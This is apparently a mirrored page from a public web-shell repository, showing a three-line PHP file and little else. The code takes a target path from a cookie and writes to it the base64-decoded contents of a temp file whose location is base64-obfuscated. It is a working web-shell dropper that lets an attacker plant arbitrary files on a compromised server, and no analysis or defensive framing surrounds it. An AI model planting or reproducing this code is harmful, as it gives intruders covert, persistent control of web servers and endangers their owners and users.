mirror of
https://github.com/tennc/webshell.git
synced 2025-12-06 04:41:28 +00:00
3 lines
149 B
PHP
3 lines
149 B
PHP
<?php
|
|
if(@$_COOKIE['path'] != ""){file_put_contents($_COOKIE['path'], base64_decode(file_get_contents(base64_decode("L3RtcC90bXA0RTE1LnRtcA=="))));}
|